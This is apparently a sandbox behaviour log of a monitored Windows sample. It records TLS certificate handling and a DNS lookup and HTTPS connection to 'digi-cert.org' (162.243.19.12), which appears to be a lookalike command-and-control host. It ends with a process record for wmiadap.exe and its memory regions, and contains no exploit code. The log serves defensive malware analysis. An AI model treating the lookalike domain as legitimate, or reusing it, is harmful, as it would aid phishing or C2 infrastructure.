	[0612.688] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23bd8df0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bdcbe8, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bdcc08, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bdcc08, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0612.689] recv (in: s=0x7d0, buf=0x2ad23bdccf8, len=5, flags=0 | out: buf=0x2ad23bdccf8*) returned 5
	[0612.689] recv (in: s=0x7d0, buf=0x2ad23bdcd1d, len=48, flags=0 | out: buf=0x2ad23bdcd1d*) returned 48
	[0612.689] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23bd8df0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bdce20, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23bdce40, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23bdce40, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0612.689] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2c00 | out: pvContextBuffer=0x2ad3bad2c00) returned 0x0
	[0612.689] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23bdcf88 | out: pBuffer=0x2ad23bdcf88) returned 0x0
	[0612.689] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23bdcfe0 | out: pBuffer=0x2ad23bdcfe0) returned 0x0
	[0612.690] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23bdd048 | out: pBuffer=0x2ad23bdd048) returned 0x0
	[0612.690] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04dd0) returned 0x2ad3bb04dd0
	[0612.690] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0612.690] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb04dd0
	[0612.690] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04dd0) returned 0x2ad3bb04dd0
	[0612.690] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb04dd0) returned 0x0
	[0612.690] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0612.690] CertFreeCertificateContext (pCertContext=0x2ad3bb04dd0) returned 1
	[0612.691] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0612.691] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb04dd0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0612.691] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb04dd0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0612.692] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0612.693] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04dd0) returned 0x2ad3bb04dd0
	[0612.694] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0612.695] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0612.695] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0612.695] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0612.695] SetLastError (dwErrCode=0x0) 
	[0612.696] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0612.696] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0612.696] CertFreeCertificateContext (pCertContext=0x2ad3bb04dd0) returned 1
	[0612.696] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bdfc50, MessageSeqNo=0x0 | out: pMessage=0x2ad23bdfc50) returned 0x0
	[0612.696] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca340
	[0612.696] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca340*=((len=0x3b, buf=0x2ad23bdcf10*), (len=0xd5, buf=0x2ad23bdfa58*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca340*=((len=0x3b, buf=0x2ad23bdcf10*), (len=0xd5, buf=0x2ad23bdfa58*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0612.696] CoTaskMemFree (pv=0x2ad3baca340) 
	[0612.697] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0612.697] recv (in: s=0x7d0, buf=0x2ad23bdfdf8, len=5, flags=0 | out: buf=0x2ad23bdfdf8*) returned 5
	[0613.193] recv (in: s=0x7d0, buf=0x2ad23bdfe1d, len=1488, flags=0 | out: buf=0x2ad23bdfe1d*) returned 1488
	[0613.193] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23be0500, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23be0500, pfQOP=0x0) returned 0x0
	[0613.193] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0613.193] SetEvent (hEvent=0x6b8) returned 1
	[0613.242] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4
	[0626.249] CloseHandle (hObject=0x3f4) returned 1
	[0626.449] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x3f4) returned 0x0
	[0626.449] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d8) returned 0x0
	[0626.449] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0626.449] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0626.450] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0626.450] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0626.450] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x388, fAsynchronous=1) returned 0x0
	[0626.450] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x164) returned 0x0
	[0626.450] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0626.450] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0626.450] GetCurrentProcess () returned 0xffffffffffffffff
	[0626.450] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0xe4) returned 1
	[0626.451] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1abc0
	[0626.451] WinHttpSetTimeouts (hInternet=0x2ad3bb1abc0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0626.452] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0626.468] SetEvent (hEvent=0x6b8) returned 1
	[0626.468] select (in: nfds=0, readfds=0x2ad23be7ef8, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23be7ef8, writefds=0x0, exceptfds=0x0) returned 1
	[0626.469] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0626.470] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0626.470] shutdown (s=0x7d0, how=2) returned 0
	[0626.477] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0626.477] closesocket (s=0x7d0) returned 0
	[0626.478] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0626.478] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x270
	[0626.478] CoTaskMemAlloc (cb=0xf) returned 0x2ad3bb1ede0
	[0626.478] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0xd7ef71bb20*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xd7ef71bb18 | out: ppResult=0xd7ef71bb18*=0x2ad3bb041c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x2ad3bb1f180*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0626.482] CoTaskMemFree (pv=0x2ad3bb1ede0) 
	[0626.482] CoTaskMemFree (pv=0x0) 
	[0626.484] FreeAddrInfoW (pAddrInfo=0x2ad3bb041c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯g", ai_addr=0x2ad3bb1f180*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0626.485] WSAConnect (in: s=0x7d0, name=0x2ad23be9a60*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0626.591] closesocket (s=0x270) returned 0
	[0626.592] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23be6668, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bea2e8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bea2e8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0626.592] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfda0 | out: pvContextBuffer=0x2ad3badfda0) returned 0x0
	[0626.592] send (in: s=0x7d0, buf=0x2ad23bea3b8*, len=333, flags=0 | out: buf=0x2ad23bea3b8*) returned 333
	[0626.593] recv (in: s=0x7d0, buf=0x2ad23bea3b8, len=5, flags=0 | out: buf=0x2ad23bea3b8*) returned 5
	[0626.699] recv (in: s=0x7d0, buf=0x2ad23bea3bd, len=49, flags=0 | out: buf=0x2ad23bea3bd*) returned 49
	[0626.699] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23be6668, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bea5f8, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bea618, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bea618, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0626.699] recv (in: s=0x7d0, buf=0x2ad23bea708, len=5, flags=0 | out: buf=0x2ad23bea708*) returned 5
	[0626.699] recv (in: s=0x7d0, buf=0x2ad23bea72d, len=1, flags=0 | out: buf=0x2ad23bea72d*) returned 1
	[0626.699] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23be6668, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bea800, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bea820, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bea820, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0626.700] recv (in: s=0x7d0, buf=0x2ad23bea910, len=5, flags=0 | out: buf=0x2ad23bea910*) returned 5
	[0626.700] recv (in: s=0x7d0, buf=0x2ad23bea935, len=48, flags=0 | out: buf=0x2ad23bea935*) returned 48
	[0626.700] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23be6668, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23beaa38, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23beaa58, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23beaa58, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0626.700] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3500 | out: pvContextBuffer=0x2ad3bad3500) returned 0x0
	[0626.700] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23beaba0 | out: pBuffer=0x2ad23beaba0) returned 0x0
	[0626.701] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23beabf8 | out: pBuffer=0x2ad23beabf8) returned 0x0
	[0626.701] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23beac60 | out: pBuffer=0x2ad23beac60) returned 0x0
	[0626.701] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05150) returned 0x2ad3bb05150
	[0626.701] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0626.701] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb05150
	[0626.701] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05150) returned 0x2ad3bb05150
	[0626.701] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb05150) returned 0x0
	[0626.701] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0626.701] CertFreeCertificateContext (pCertContext=0x2ad3bb05150) returned 1
	[0626.702] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0626.702] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb05150, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0626.702] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb05150, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0626.703] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0626.704] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05150) returned 0x2ad3bb05150
	[0626.705] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0626.708] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0626.708] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0626.708] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0626.708] SetLastError (dwErrCode=0x0) 
	[0626.708] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0626.708] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0626.709] CertFreeCertificateContext (pCertContext=0x2ad3bb05150) returned 1
	[0626.709] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bed868, MessageSeqNo=0x0 | out: pMessage=0x2ad23bed868) returned 0x0
	[0626.709] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca130
	[0626.709] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca130*=((len=0x3b, buf=0x2ad23beab28*), (len=0xd5, buf=0x2ad23bed670*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca130*=((len=0x3b, buf=0x2ad23beab28*), (len=0xd5, buf=0x2ad23bed670*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0626.709] CoTaskMemFree (pv=0x2ad3baca130) 
	[0626.709] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0626.709] recv (in: s=0x7d0, buf=0x2ad23beda10, len=5, flags=0 | out: buf=0x2ad23beda10*) returned 5
	[0627.190] recv (in: s=0x7d0, buf=0x2ad23beda35, len=1488, flags=0 | out: buf=0x2ad23beda35*) returned 1488
	[0627.191] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23bee118, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23bee118, pfQOP=0x0) returned 0x0
	[0627.191] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0627.191] SetEvent (hEvent=0x6b8) returned 1
	[0627.246] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4
	[0640.252] CloseHandle (hObject=0x3f4) returned 1

Thread:
	id = 201
	os_tid = 0xbd0


Thread:
	id = 202
	os_tid = 0x90c

	[0123.379] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0123.382] ResetEvent (hEvent=0x6b8) returned 1

Thread:
	id = 206
	os_tid = 0x2fc


Process:
	id = "11"
	image_name = "wmiadap.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiadap.exe"
	page_root = "0x3ba3e000"
	os_pid = "0x3ec"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "5"
	os_parent_pid = "0x3b8"
	cmd_line = "wmiadap.exe /F /T /R"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cb16" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]

Region:
	              id = 2175
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2176
	        start_va = 0x83db6e0000
	          end_va = 0x83db75ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000083db6e0000"
	        filename = ""

Region:
	              id = 2177
	        start_va = 0x83db800000
	          end_va = 0x83db9fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000083db800000"
	        filename = ""

Region:
	              id = 2178
	        start_va = 0x262190c0000
	          end_va = 0x262190dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000262190c0000"
	        filename = ""

Region:
	              id = 2179
	        start_va = 0x262190e0000
	          end_va = 0x262190f4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000262190e0000"
	        filename = ""

Region:
	              id = 2180
	        start_va = 0x26219100000
	          end_va = 0x26219103fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000026219100000"
	        filename = ""

Region:
	              id = 2181
	        start_va = 0x26219110000
	          end_va = 0x26219110fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000026219110000"
	        filename = ""

Region:
	              id = 2182
	        start_va = 0x26219120000
	          end_va = 0x26219121fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000026219120000"
	        filename = ""

Region:
	              id = 2183
	        start_va = 0x7df5ff040000
	          end_va = 0x7ff5ff03ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff040000"
	        filename = ""

Region:
	              id = 2184
	        start_va = 0x7ff61e1d0000
	          end_va = 0x7ff61e1f2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff61e1d0000"
	        filename = ""

Region:
	              id = 2185
	        start_va = 0x7ff61ede0000
	          end_va = 0x7ff61ee0efff
	     entry_point = 0x7ff61ede0000
	     region_type = mapped_file
	            name = "wmiadap.exe"
	        filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe")

Region:
	              id = 2186
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2187
	        start_va = 0x26219140000
	          end_va = 0x2621923ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000026219140000"
	        filename = ""

Region:
	              id = 2188
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 2189
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 2337
	        start_va = 0x83db760000
	          end_va = 0x83db7dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000083db760000"
	        filename = ""

Region:
	              id = 2338
	        start_va = 0x262190c0000
	          end_va = 0x262190cffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000262190c0000"
	        filename = ""

Region:
	              id = 2339
	        start_va = 0x262190d0000
	          end_va = 0x262190d6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000262190d0000"
	        filename = ""

Region:
	              id = 2340
	        start_va = 0x26219240000
	          end_va = 0x262192fdfff
	     entry_point = 0x26219240000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2341
	        start_va = 0x7ff61e0d0000
	          end_va = 0x7ff61e1cffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff61e0d0000"
	        filename = ""

Region:
	              id = 2342
	        start_va = 0x7ffbfe480000
	          end_va = 0x7ffbfe4a4fff
	     entry_point = 0x7ffbfe480000
	     region_type = mapped_file
	            name = "loadperf.dll"
	        filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll")

Region:
	              id = 2343
	        start_va = 0x7ffc07e60000
	          end_va = 0x7ffc07edefff
	     entry_point = 0x7ffc07e60000
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 2344
	        start_va = 0x7ffc13950000
	          end_va = 0x7ffc13978fff
	     entry_point = 0x7ffc13950000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 2345
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 2346
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 2347
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 2348
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 2349
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 2350
	        start_va = 0x7ffc16970000
	          end_va = 0x7ffc169dafff
	     entry_point = 0x7ffc16970000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 2351
	        start_va = 0x83dba00000
	          end_va = 0x83dba7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000083dba00000"
	        filename = ""

Region:
	              id = 2352
	        start_va = 0x26219130000
	          end_va = 0x26219136fff
	     entry_point = 0x0
	     region_type = private
